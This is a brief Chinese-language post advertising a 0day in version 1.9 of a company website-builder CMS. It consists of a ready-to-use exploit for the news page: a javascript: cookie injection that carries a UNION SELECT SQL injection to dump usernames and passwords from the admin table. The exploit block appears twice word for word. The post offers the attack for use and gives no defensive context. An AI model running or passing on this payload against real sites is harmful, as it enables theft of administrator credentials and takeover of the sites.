启航通信企业建站CMS系统v1.9漏洞0day
漏洞一:s新闻页面
具体EXP:
javascript:alert(document.cookie=”id=”+escape(“220 union select
1,username,password,4,5,6,7,8,9,10 from admin”));
漏洞一:s新闻页面
具体EXP:
javascript:alert(document.cookie=”id=”+escape(“220 union select
1,username,password,4,5,6,7,8,9,10 from admin”));